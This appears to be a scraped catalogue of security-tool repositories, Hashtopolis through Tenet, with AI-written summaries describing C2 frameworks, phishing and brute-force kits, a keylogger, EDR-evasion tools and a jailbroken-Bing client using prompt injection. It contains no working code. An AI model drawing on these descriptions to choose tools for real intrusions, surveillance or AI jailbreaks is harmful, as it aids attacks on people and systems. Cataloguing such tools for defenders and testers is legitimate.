Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Hashtopolis is a client-server tool designed for distributing hashcat tasks across multiple computers, facilitating efficient password cracking on a scalable architecture. Notable features include multi-user support, a web-based administration interface, customizable agents, and strong security measures including agent trust levels and “secret” file handling. It utilizes an HTTP(S) communication protocol with a JSON-based configuration, enhancing usability and compatibility with common web hosting setups.

README

Hashtopolis

Hashtopolis is a multi-platform client-server tool for distributing hashcat tasks to multiple computers. The main goals for Hashtopolis’s development are portability, robustness, multi-user support, and multiple groups management. The application has two parts:

SessionGopher

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SessionGopher is a PowerShell-based tool designed to retrieve and decrypt saved session information from remote access applications like PuTTY, WinSCP, FileZilla, and RDP. Its primary use case is for security assessments to identify systems that may connect to sensitive environments such as Unix systems or remote desktops. Notable features include thorough filesystem searches for private key files and the ability to run queries across multiple hosts or domain-joined systems, with results conveniently outputted to CSV files.

shad0w

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SHAD0W is a modular command and control (C2) framework designed for advanced threat operations within mature environments, leveraging techniques to evade endpoint detection and antivirus systems. Built with Python and C, it enables the execution of payloads including .NET assemblies and scripts entirely in memory, while offering features such as HTTPS communication, dynamic process injection, and extensive modularity for tasking beacons. Notable components include built-in privilege escalation exploits, a live web proxy feature, and a robust command-line interface, facilitating customization and effective covert operations.

shannon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Shannon is an autonomous AI penetration testing tool designed for web applications and APIs, capable of performing white-box security assessments through source code analysis and real exploit execution. It identifies potential vulnerabilities such as injection attacks and authentication bypasses, generating reports that include only verified exploits with reproducible proof-of-concept evidence. Key features include fully automated operation, OWASP vulnerability coverage, and integrated security tooling, making it suitable for continuous security testing throughout the software development lifecycle.

sharkjack-payloads

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Shark Jack Payload Library provides a collection of community-driven payloads and extensions specifically designed for the Hak5 Shark Jack device, utilizing DuckyScript™ and Bash. Its primary use case is to enrich the functionality of the Shark Jack with customizable scripts for cybersecurity tasks, while also encouraging developer contributions for new payloads. Notable features include a platform for community collaboration and integration with Payload Studio for seamless payload creation.

shellen

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Shellen is an interactive shellcoding environment designed for writing and utilizing shellcodes, supporting both assembly and disassembly operations. Leveraging the keystone and capstone engines, Shellen allows users to seamlessly switch between different modes, search syscall tables, and run shellcodes within a subprocess, while providing a user-friendly prompt that displays the current status and architecture. This tool caters primarily to developers and security researchers working with low-level code, making shellcode manipulation intuitive and efficient.

shhgit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: shhgit is a tool designed to enhance the security of development teams by identifying leaked secrets in code repositories, such as API tokens and private keys, before they can be exploited by malicious actors. It operates either by scanning public repositories via APIs of GitHub, GitLab, and BitBucket or processing local directories, and features a customizable search capability along with options for CSV reporting and entropy-based analysis. Notably, the tool is flexible for both cloud and local deployments, making it suitable for integration into CI/CD pipelines.

shortscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Shortscan is an IIS short filename enumeration tool that rapidly identifies files with short filenames on an IIS web server and attempts to discover their corresponding full filenames using a unique checksum matching method. Its notable features include support for custom headers, concurrency settings, and vulnerability checks without full file enumeration, as well as the ability to utilize custom wordlists and generate rainbow tables through an accompanying utility named shortutil.

sicat

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SICAT is a comprehensive vulnerability and exploit finder that streamlines the reconnaissance process by aggregating data from multiple reputable databases based on user-defined keywords, Nmap scan results, or detected web technologies. Notable features include a modern web interface with real-time feedback, detailed HTML reporting with interactive elements, and intelligent keyword generation for enhanced search accuracy, all while supporting multithreaded scanning for optimized performance. This tool significantly aids security professionals in identifying vulnerabilities across various platforms and frameworks.

SIGIT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SIGIT is a modular OSINT CLI tool designed for efficient collection of public information, supporting reconnaissance, security testing, and digital forensics tasks. Its architecture leverages asynchronous programming and parallel scanning to enable fast data gathering across 14 diverse tools, including username checks, IP location services, and SSL certificate analysis. Notable features include a user-friendly command-line interface and a design that minimizes resource leaks through automated session management.

README

SIGIT

Simple Information Gathering Toolkit - Modular OSINT CLI

SILENTTRINITY

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SILENTTRINITY is a modern, asynchronous, multiplayer command and control (C2) and post-exploitation framework designed for flexibility and stealth, utilizing Python 3 and the .NET Dynamic Language Runtime. It offers features such as real-time updates via Websockets, ECDHE encrypted communications, and a fully modular architecture allowing operators to customize their C2 channels and modules. The framework leverages embedded third-party .NET scripting languages for dynamic task evaluation, enhancing usability and providing capabilities akin to PowerShell without its direct use.

Silver

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Silver is a mass vulnerability scanner that integrates with masscan and nmap to provide rapid, comprehensive TCP port scanning and vulnerability assessment. Notable features include resumable scanning, multi-core utilization, caching of vulnerability data, and integration with Shodan, allowing for efficient parallel processing and streamlined notifications through Slack. Its support for various input formats and customizable scanning options enhances its usability for security assessments across different environments.

README

Silver

Mass Vulnerability Scanner

simple-security-toolkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Simple Security Toolkit is a collection of practical guides and checklists designed to enhance the security of smart contract development, primarily targeting early-stage protocol teams. Key features include a structured development process, audit readiness and pre-launch security checklists, and an incident response plan template, all aimed at preventing vulnerabilities and ensuring robust deployment practices. This resource is intended to streamline security preparations and foster efficient auditing processes while encouraging contributions from the community.

simplify

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Simplify is a generic Android deobfuscator that virtually executes obfuscated apps to enhance code readability while preserving their functional behavior. It operates through a combination of smalivm, which simulates Dalvik method execution, and simplify, which optimizes execution graphs by applying techniques such as constant propagation and dead code removal. Notable features include the ability to handle various obfuscation patterns without renaming methods or classes, and a customizable execution environment to manage optimization parameters.

sipvicious

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SIPVicious OSS is a comprehensive toolset designed for auditing SIP-based VoIP systems. Its primary functions include discovering SIP servers, enumerating extensions, and facilitating password cracking through various methods, making it an essential resource for penetration testing of VoIP infrastructures. Notable features include its scanning capabilities (svmap), extension identification (svwar), password cracking (svcrack), session reporting (svreport), and the ability to exploit vulnerabilities in SIP systems (svcrash).

README

Welcome to SIPVicious OSS security tools

sitedorks

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SiteDorks is a versatile tool designed for conducting advanced searches across multiple search engines like Google and Bing using predefined dork lists. It simplifies the querying process by allowing users to categorize their search terms and automate input from a default list of 629 dorkable websites. Notable features include the ability to customize searches, manage multiple domain queries easily, and access regularly updated lists for specific countries and categories.

skanuvaty

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Skanuvaty is a high-performance DNS/network/port scanning tool that allows users to quickly analyze a domain by discovering its subdomains and resolving their corresponding IPs. Notable features include support for concurrent scans, with the ability to test thousands of subdomains within seconds, and the generation of a comprehensive output file in JSON format for further analysis.

README

Skanuvaty

Dangerously fast dns/network/port scanner, all-in-one.

Start with a domain, and we’ll find everything about it.

skidfuscator-java-obfuscator

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Skidfuscator is a production-grade Java obfuscation tool that employs SSA form to enhance and obscure Java bytecode flow while maintaining execution efficiency. Its primary use case is to protect applications from reverse engineering by providing advanced obfuscation techniques, automatic dependency downloading, and an easy-to-configure command-line interface. Notable features include smart recovery, flow obfuscation, and out-of-the-box optimization.

README

🗣️ Discord: https://discord.gg/QJC9g8fBU9 📚 Wiki: https://skidfuscator.dev/docs/

🏢 Enterprise/Custom Version: https://skidfuscator.dev/pricing

SkyArk

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SkyArk is a cloud security tool that focuses on detecting and mitigating the threat of Cloud Shadow Admins in AWS and Azure environments through its two main scanning modules: AWStealth and AzureStealth. It identifies the most privileged cloud users and helps organizations ensure these entities are secured with best practices such as strong credentials and MFA. Notably, SkyArk enables risk assessment by uncovering hidden admin accounts that may escalate privileges if left unmanaged.

slowloris

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Slowloris is a Python tool designed to execute HTTP Denial of Service attacks against threaded servers by maintaining numerous open connections through periodic header transmissions, thereby exhausting the server’s thread pool. It supports SOCKS5 proxy connections for enhanced anonymity and offers various configuration options such as socket count, random user agents, and logging verbosity to customize the attack parameters. This tool is primarily used for testing the resilience of web servers against DoS attacks.

Smart-Contract-Auditor-Tools-and-Techniques

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Smart Contract Auditor Tools and Techniques repository provides a compilation of resources and tools aimed at enhancing the security and auditing processes for smart contracts. It features a variety of transaction visualization tools, educational pathways for aspiring auditors, and various miscellaneous tools for detecting vulnerabilities, simulating attacks, and analyzing smart contract behavior across Ethereum and other EVM-compatible blockchains. Notably, it includes links to web-based platforms for on-chain investigation and defense against potential exploits, making it a critical resource for both new and experienced blockchain security professionals.

sn0int

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: sn0int is a semi-automatic OSINT framework and package manager designed for IT security professionals and researchers to gather intelligence on targets or themselves. It facilitates the enumeration of attack surfaces by processing public information through flexible, modular analysis tools and provides features such as subdomain harvesting, IP address enrichment, login breach discovery, and social media profile analysis. Its extensible architecture allows users to create and share custom modules, enhancing its versatility in investigations.

Sn1per

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Sn1per is an automated penetration testing and attack surface management tool that enhances vulnerability scanning by integrating both commercial and open-source scanners to identify hidden assets and vulnerabilities within an organization’s environment. It streamlines the security assessment process through automation, providing deep and continuous security insights suitable for organizations of all sizes. Notable features include its capability to discover and prioritize risks, saving time and resources in the vulnerability management lifecycle.

social-analyzer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Social Analyzer is an OSINT tool designed to analyze and locate a person’s profiles across over 1000 social media platforms via an API, CLI, or web application. Its primary use case includes investigating potential malicious activities like cyberbullying and misinformation dissemination through sophisticated detection modules that yield a confidence rating. Notable features include multi-profile searches, various detection techniques (such as OCR and advanced algorithms), and customizable queries for enhanced data extraction and analysis.

Social-Media-OSINT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Social-Media-OSINT is a comprehensive resource tool designed for open-source intelligence (OSINT) gathering on various social media platforms and messenger applications. Its primary use case includes providing links to tools, techniques, and methodologies for effective information extraction and analysis across platforms such as Facebook, Instagram, LinkedIn, and more. Notable features include extensive categorization of social media types and resources for advanced analytics on topics like hate speech and disinformation.

Social-Media-OSINT-Tools-Collection

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Social-Media-OSINT-Tools-Collection is a comprehensive repository aimed at providing tools for gathering open-source intelligence (OSINT) specifically from social media platforms. Its primary use case involves enabling users to track and analyze information from various social media sites such as Facebook, Instagram, and Twitter, utilizing features like link checkers, keyword searches, and profile lookups. Notable features include monitoring public mentions, recovering accounts, and various specialized search tools that enhance intelligence gathering capabilities.

SocialBox-Termux

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SocialBox-Termux is a brute-force attack framework designed for social media platforms such as Facebook, Gmail, Instagram, and Twitter. It facilitates penetration testing by automating the login attempts using various credentials, making it useful for security professionals. Notable features include compatibility with Termux on Android, easy installation via a shell script, and the ability to run under a VPN for enhanced privacy.

README

SocialBox-Termux

SocialBox is a Bruteforce Attack Framework [ Facebook , Gmail , Instagram ,Twitter ] , Coded By Belahsan Ouerghi Edit By samsesh

SocialFish

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SocialFish is a phishing tool primarily designed for educational purposes, allowing users to create customizable social engineering attack vectors. It features a user-friendly interface and supports Docker for easy deployment. The tool enables users to simulate phishing attacks to assess and enhance security awareness and defenses against social engineering threats.

README

SocialFish

Are you looking for SF’s mobile controller? UndeadSec/SocialFishMobile

Are you looking for SF’s old version(Ngrok integrated) ? UndeadSec/SociaFish/…/sharkNet

socid-extractor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: socid-extractor is a command-line tool and Python library designed for extracting user profile data from various social media and web platforms, storing the information in a machine-readable format. Supporting over 100 methods for different sites, it enables users to retrieve details such as usernames, links, and personal attributes, facilitating use cases in OSINT and user tracking. Notable features include the ability to skip HTTP requests for unknown URLs, batch processing options, and integration capabilities for broader investigative workflows.

sogen

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Sogen is a high-performance Windows user space emulator designed for syscall-level operation, granting detailed control over process execution, particularly useful in security analysis, malware dissection, and DRM research. Notable features include advanced memory management, complete PE loading support, implemented Windows structured exception handling, a scheduled threading model, and comprehensive debugging interfaces, including GDB compatibility for seamless integration with popular debugging tools.

README

Sogen is a high-performance Windows user space emulator that operates at syscall level, providing full control over process execution through comprehensive hooking capabilities.

SpecialK

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Special K is a versatile tool designed for PC gaming that enhances graphics and performance through code injection. It allows users to modify game behavior by injecting its DLL into applications, supporting both local and global injection methods, which enables a wide range of visual and performance adjustments. Notable features include performance analysis tools, shader and texture modifications, and compatibility with various graphics APIs in both Windows and WINE environments.

spectre-attack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Spectre Attack Example repository demonstrates an exploit based on the Spectre vulnerability (CVE-2017-5753 and CVE-2017-5715), which allows attackers to read sensitive information from memory by exploiting speculative execution. The tool constructs a scenario where out-of-bounds memory reads can leak data via cache timing attacks, highlighting how seemingly safe coding practices can inadvertently increase vulnerability. Notable features include the ability to test system vulnerability, read specified memory addresses, and compile with both GCC and Visual Studio.

spicedb

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SpiceDB is an open-source authorization database inspired by Google’s Zanzibar system, designed to provide scalable and secure permission checks for applications. It allows developers to define schemas, manage relationships, and conduct queries to assess user permissions on resources, addressing critical access control threats. Notable features include its relational-like structure for defining authorization models and its capability to handle complex permission queries for enhanced security management.

README

SpiceDB sets the standard for authorization that scales.

Scale with
Traffic • Dev Velocity • Functionality • Geography

SpiderSuite

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SpiderSuite is an advanced cross-platform web crawling tool specifically crafted for security professionals, facilitating comprehensive web audits and vulnerability assessments. Notable features include ease of installation, user-friendly documentation, and a feature-rich environment tailored for first-time users. The tool aims to enhance security testing processes through efficient crawling capabilities.

README

• Roadmap

SpiderSuite is an advance cross-platform and multi-feature web crawler designed for security professionals. For more information visit SpiderSuite’s website.

spoilerwall

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Spoilerwall is a network hardening tool that obscures open ports by serving movie spoilers whenever a scan is performed, effectively misleading potential attackers. Its primary use case is to create a deceptive environment that appears vulnerable but instead provides mundane content, deterring unwanted attention and scans. Notable features include customizable spoiler content, easy server setup, and the ability to redirect all TCP traffic to the Spoilerwall service, enhancing security through obfuscation.

Spoofy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Spoofy is a Python-based tool designed to evaluate the spoofability of domains by analyzing their SPF and DMARC records. It features authoritative lookups with a known DNS fallback, accurate bulk processing, and a customizable spoof logic derived from real-world testing, enabling users to conduct comprehensive assessments of domain security configurations. Additionally, Spoofy offers DKIM selector enumeration via API as an optional feature, making it a valuable resource for cybersecurity assessments.

spray

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SPRAY is a high-performance directory fuzzing tool designed for testing and exploiting web applications, boasting over 50% greater performance compared to similar tools like ffuf and feroxbuster. It features customizable dictionary generation based on masks or rules, dynamic filtering, extensive fingerprint recognition capabilities, and the ability to handle multiple targets efficiently with resume options for interrupted sessions. The tool seamlessly integrates with *nix command line environments, facilitating inter-operation with other cybersecurity tools.

sqlmap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: sqlmap is an open-source penetration testing tool designed for automating the detection and exploitation of SQL injection vulnerabilities in web applications. It features a robust detection engine with capabilities such as database fingerprinting, data extraction, file system access, and command execution through out-of-band connections, making it a comprehensive tool for security professionals. The tool is compatible with Python 2.7 and 3.x, ensuring broad platform support.

README

sqlmap

ssh-mitm

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SSH-MITM is a security auditing tool that functions as a man-in-the-middle SSH server, capable of intercepting and analyzing SSH sessions. It supports various authentication methods, including public key and password authentication, along with features like session hijacking, file manipulation during SCP/SFTP transfers, and dynamic port forwarding. Notably, it also includes capabilities for phishing FIDO tokens and auditing clients for known vulnerabilities, making it a versatile solution for security assessments.

ssl-kill-switch2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SSL Kill Switch 2 is a blackbox tool designed to disable SSL/TLS certificate validation, including certificate pinning, in iOS and macOS applications. This tool modifies low-level functions managing SSL/TLS connections to bypass the system’s default validation, enabling man-in-the-middle attacks on SSL or HTTPS traffic. It supports installation as a Cydia Substrate tweak on jailbroken iOS devices and can be injected as a dynamic library into macOS applications for similar functionality.

SSRF-Testing

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SSRF-Testing is a tool designed for testing and exploiting Server Side Request Forgery (SSRF) vulnerabilities. It provides a variety of resources, including quick URL bypass methods, custom HTTP response generation, and a minimal web server setup for testing different response codes across various file types. Notably, it also includes an IP encoding utility to facilitate testing within whitelisted domains.

README

SSTImap

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SSTImap is a penetration testing tool designed to identify and exploit Server-Side Template Injection (SSTI) vulnerabilities in web applications. Its notable features include an interactive mode for enhanced exploitation, support for various programming languages and template engines, and a modular plugin architecture allowing for extensibility. The tool enables advanced exploitation techniques, including the use of generic payloads and evaluation scenarios.

README

SSTImap

SteamKit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SteamKit is a .NET library that facilitates interaction with Valve’s Steam network, providing a flexible and extensible interface for executing various network operations. Its primary use case is enabling developers to create applications that can leverage Steam’s functionalities, such as game management and account handling. Notable features include its distribution as a NuGet package for easy integration, comprehensive XML documentation, and support for .NET 10.0 or higher.

README

SteamKit

SteamTracking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SteamTracking is a tool designed to automate the monitoring of various metrics associated with Steam accounts and game performance. Its primary use case is to streamline the process of tracking gameplay statistics and trends, reducing the manual effort required for users. Notable features include automated data collection and user-friendly insights into gaming habits.

README

Steam Tracking

Tracking things, so you don’t have to.

stegcloak

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: StegCloak is a JavaScript steganography module that conceals secrets within text by using invisible Unicode characters after compressing and encrypting the data. It is designed for covert communication, allowing users to safely embed strings in various platforms while ensuring cryptographic security through AES-256-CTR encryption and HMAC integrity checks. Key features include high-speed processing, support for hiding file links, and a flexible interface available via API, command-line, and web interface.

stego-toolkit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Stego-Toolkit is a Docker image designed for tackling steganography challenges frequently encountered in CTF platforms. It comes pre-loaded with a variety of popular tools and screening scripts that facilitate the analysis of images and audio files for hidden data, allowing users to effortlessly run command-line and GUI applications within a containerized environment. Notable features include automation scripts for file screening and support for both Linux and Windows tools via Wine, ensuring a comprehensive toolkit for steganography analysis.

stegseek

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Stegseek is a high-performance steghide cracker designed to efficiently extract hidden data from files, achieving remarkable speeds by leveraging a comprehensive wordlist, such as rockyou.txt, to crack passwords in under two seconds. Its primary use case includes both password cracking and the detection of steghide metadata without requiring passwords, enabling users to ascertain file contents speedily. Notable features include the ability to brute-force the random number generator used in steghide to recover unencrypted files and detailed metadata extraction.

Storm-Breaker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Storm-Breaker is a versatile cybersecurity tool that enables unauthorized access to device information, including location, webcam, and microphone on smartphones, without requiring user permissions. Notable features include a revamped web user interface, the ability to operate on personal hosting environments, auto-download functionality for Ngrok, and comprehensive logging capabilities. This tool is primarily designed for penetration testing and social engineering exercises within controlled environments.

README

A Tool With Attractive Capabilities.

Stowaway

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Stowaway is a multi-tier proxy tool written in Go, designed specifically for penetration testers to route external traffic through multiple nodes into an internal network, thereby overcoming access restrictions. Notable features include user-friendly command-line interface, tree structure node management, support for various connection types (socks5, HTTP, SSH), traffic encryption using TLS/AES-256-GCM, and capabilities for remote shell, file transfer, and port mapping, all while maintaining compatibility across multiple platforms such as Linux, Mac, and Windows.

stunner

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Stunner is a specialized tool designed for testing and exploiting STUN and TURN servers, particularly in the context of videoconferencing and audio chat applications utilizing the TURN protocol. Its primary use case involves identifying misconfigurations in TURN servers, enabling users to establish a SOCKS proxy that routes traffic through these servers into internal networks. Notable features include the ability to enumerate accessible IP addresses, perform detailed server information queries, and set up a local SOCKS server for traffic relaying.

SubDomainizer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SubDomainizer is a reconnaissance tool that identifies hidden subdomains and secrets from specified URLs, web pages, and external JavaScript files. It supports various cloud storage services and can detect S3 buckets and CloudFront URLs, potentially exposing vulnerabilities such as open read/write permissions and subdomain takeover risks. The tool is capable of scanning both individual URLs and lists, with a feature for extracting secrets based on keyword searches and Shannon Entropy calculations, although this is currently in beta phase.

subjack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Subjack is a DNS takeover scanner written in Go, designed for the concurrent scanning of domain lists to identify registrable domains vulnerable to hijacking. It features detection capabilities for various vulnerability types including CNAME takeovers, NS delegation issues, stale A records, and more, allowing security professionals to assess the risk of domain takeovers effectively. With an emphasis on speed and efficiency, Subjack provides functionalities such as customizable concurrency and thorough output options to facilitate large-scale testing.

sublert

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Sublert is a Python-based security tool designed for monitoring new subdomains associated with specific organizations by leveraging certificate transparency. It facilitates automated alerts to a Slack workspace for newly identified subdomains and includes functionalities for DNS resolution to verify active subdomains. Key features include periodic monitoring, configuration options for concurrent threads, and logging capabilities.

README

_____ __ __ __ / ___/__ __/ /_ / /__ _____/ /_ \__ \/ / / / __ \/ / _ \/ ___/ __/ ___/ / /_/ / /_/ / / __/ / / /_ /____/\__,_/_.___/_/\___/_/ \__/ Author: Yassine Aboukir Version: 1.4.7

SubOver

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SubOver is a Golang-based tool designed for detecting potential subdomain takeovers across more than 30 services, leveraging Go’s concurrency for enhanced speed and efficiency. Its primary use case is for security professionals conducting assessments of web applications to identify vulnerable subdomains that can be hijacked. Notable features include a comprehensive service list, customizable concurrent threads, and a straightforward command-line interface for easy operation.

README

SubOver

Note - This project is discontinued. No more updates will be provided! Sorry!

But something more awesome will come soon!

subscraper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SubScraper is a subdomain enumeration tool designed for penetration testers and bug bounty hunters, enabling the discovery of an organization’s attack surface through multiple techniques. It supports DNS resolution, HTTP(S) requests, and CNAME lookups, along with modular support for various data sources and the capability to handle multiple targets. Key features include compatibility with Windows CLI, output formatting in .txt or .csv, and easy extensibility to add new enumeration methods.

SUDO_KILLER

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SUDO_KILLER is a cybersecurity tool designed for professionals such as pentesters and security auditors, focusing on privilege escalation vulnerabilities in Linux systems related to SUDO configuration and usage. It manually identifies issues such as misconfigurations, risky binaries, and version-based vulnerabilities (CVEs), enabling users to exploit these weaknesses for gaining root-level privileges. The tool provides a detailed checklist of potential local exploits and requires users to perform the exploitation process manually, ensuring a controlled approach to privilege escalation testing.

Sudomy

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Sudomy is a subdomain enumeration and analysis tool designed for advanced automated reconnaissance and OSINT activities. It features both active and passive enumeration methods, utilizing efficient techniques such as DNS brute-forcing via Gobuster and data collection from 22 curated third-party sources. Additional capabilities include subdomain testing, virtual host classification, port scanning, and technology identification, making it a comprehensive solution for penetration testing and bug bounty applications.

README

Sudomy

Swift-Keylogger

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Swift-Keylogger is a macOS tool designed to monitor and log keystrokes while providing contextual information about the applications generating those keystrokes. It utilizes low-level HID APIs to ensure stability despite Apple’s deprecation of certain high-level APIs and organizes the logged data by application and timestamps in a structured directory format. The tool can be integrated with Cocoa applications, offering both executable usage and source code incorporation, making it flexible for developers.

SwiftnessX

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SwiftnessX is a cross-platform note-taking and target-tracking application designed specifically for penetration testers, built on the ElectronJS framework. It features customizable checklists, including the OWASP Testing Checklist, and allows users to import/export their checklists, enhancing organized documentation throughout the penetration testing process. The tool aims to streamline the workflow for security professionals by providing a unified interface for managing testing notes and methodologies.

README

SwiftnessX v0.2

SydneyQt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: SydneyQt is a cross-platform desktop client designed for the jailbroken New Bing AI Copilot, enabling advanced interactions with the AI through capabilities such as prompt injection, CAPTCHA resolution via Selenium, and context editing. Key features include support for various file types and multimedia interactions, customizable quick responses, and integration with OpenAI’s API, all presented within a modern and user-friendly interface. The tool is built with Go and Wails, offering robust functionality while allowing users to bypass regional restrictions and enhance their AI interactions.

sysmon-modular

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: sysmon-modular is a modular Sysmon configuration repository designed for customization and maintenance of Microsoft Sysinternals’ Sysmon tool. Its primary use case is to generate tailored event logging configurations for monitoring system behavior and enhancing threat detection in diverse environments. Notable features include pre-generated configurations catering to different verbosity levels, a flexible module system for incorporating custom configurations, and automated XML generation through a PowerShell script integrated with Azure Pipelines.

T-LOAD

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: T-load is a bash-based script designed for customizing the Termux terminal interface on both rooted and non-rooted Android devices. Its primary use case is to enhance the user experience by providing an attractive and engaging terminal environment, complete with sound effects and an updated layout. Notable features include an easy installation process, new interface options, and the ability to revert to the default terminal settings.

README

tabby

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TABBY is a static code analysis tool designed for Java that rapidly identifies various types of vulnerabilities within Java applications. It utilizes the Soot framework to transform Java bytecode (JAR/WAR/CLASS files) into a code property graph (CPG), which is then stored in a Neo4j graph database, allowing for complex taint analysis and vulnerability chain detection through simple Cypher queries. Notable features include the ability to discover deserialization attack chains and common web vulnerabilities, significantly enhancing the efficiency of code audits by reducing manual search efforts.

TangledWinExec

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Tangled WinExec is a repository that provides a collection of proof-of-concept tools focused on various Windows process execution techniques, aimed at facilitating investigation and understanding of these methods. Notable features include techniques such as Process Hollowing, Command Line Spoofing, and Process Doppelgänging, with some PoCs tailored for specific Windows versions and kernel protection mechanisms. Each toolset includes documentation for testing and utilization, enabling advanced users to explore process manipulation techniques effectively.

taranis-ai

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Taranis AI is an advanced Open-Source Intelligence (OSINT) tool that utilizes Artificial Intelligence and Natural Language Processing to gather and enhance information from various unstructured data sources, primarily news articles. Its notable features include a streamlined workflow for analysts to convert unstructured data into structured reports, multi-format output capabilities, seamless publication of intelligence products, and experimental support for collaborative threat intelligence via integration with MISP.

README

Taranis AI

Tata-Sky-IPTV

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Tata Sky/Play IPTV Script generator is a tool that creates an m3u playlist containing direct streamable files, specifically designed for users with a Tata Sky subscription. It offers both an easy-to-use app and a command-line script for generating the playlist, with features like automatic login credential storage and expiration notifications for the generated playlist. This tool is primarily aimed at facilitating seamless access to subscribed channels through compatible IPTV applications.

TegraRcmGUI

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: TegraRcmGUI is a Windows-based graphical user interface that facilitates the injection of payloads into Nintendo Switch consoles utilizing the Fusée Gelée exploit for RCM mode. Key features include the ability to manage favorites, run Linux on the Switch, mount the device as USB mass storage, and dump BIS keys for eMMC content decryption. The tool also offers conveniences such as auto-injection options, minimizing to the system tray, and automatic startup with Windows.

Telegram-OSINT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Telegram-OSINT is a comprehensive resource hub designed for open-source intelligence (OSINT) researchers focusing on the Telegram platform. It provides guides, tools, and best practices to ensure users maintain operational security (OPSEC) while gathering intelligence, including constructing virtual machines for safe research. Noteworthy features include links to various blogs, tools, and a transparency report bot, addressing the complexities of OSINT in a rapidly changing digital landscape.

README

Telegram-OSINT

telegram-scraper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Telegram Channel Scraper is a Python-based tool that enables users to scrape messages and media from Telegram channels using the Telethon library. Key features include real-time scraping, enhanced metadata capture such as message statistics and reactions, smart filtering for channel management, and data export capabilities in CSV and JSON formats. With automatic database migration and a user-friendly interactive menu, it supports efficient channel monitoring and data retrieval.

TelemetrySourcerer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Telemetry Sourcerer is a tool designed for red teamers and security researchers to enumerate and disable various sources of telemetry utilized by antivirus and endpoint detection and response (EDR) systems on Windows. It features the ability to suppress kernel-mode callbacks, unhook inline user-mode hooks, and identify relevant Event Tracing for Windows (ETW) sessions, making it instrumental in identifying blind spots and validating evasion techniques within lab environments. However, it is primarily for research applications and carries OPSEC risks if deployed in production settings.

Template

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Template is a heuristic internal network scanning tool designed for security assessments and vulnerability detection. It features a producer-consumer model for efficient data handling, employs heuristic scanning methods to minimize packet sending, and includes robust web fingerprinting capabilities with over 900 fingerprints. Additionally, it supports extreme concurrency in its modules, optimizing performance during scans and brute force attacks.

README

Template - 启发式内网扫描

tenet

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Tenet is an IDA Pro plugin designed for exploring execution traces of binaries, facilitating a more intuitive navigation of complex execution patterns. It supports bidirectional exploration of traces with visual representation of execution flow, along with features for zooming and setting breakpoints on instructions and memory. This tool is particularly useful for reverse engineers aiming to analyze program behavior and execution contexts in a detailed manner.

README

Tenet - A Trace Explorer for Reverse Engineers

TermuxCyberArmy

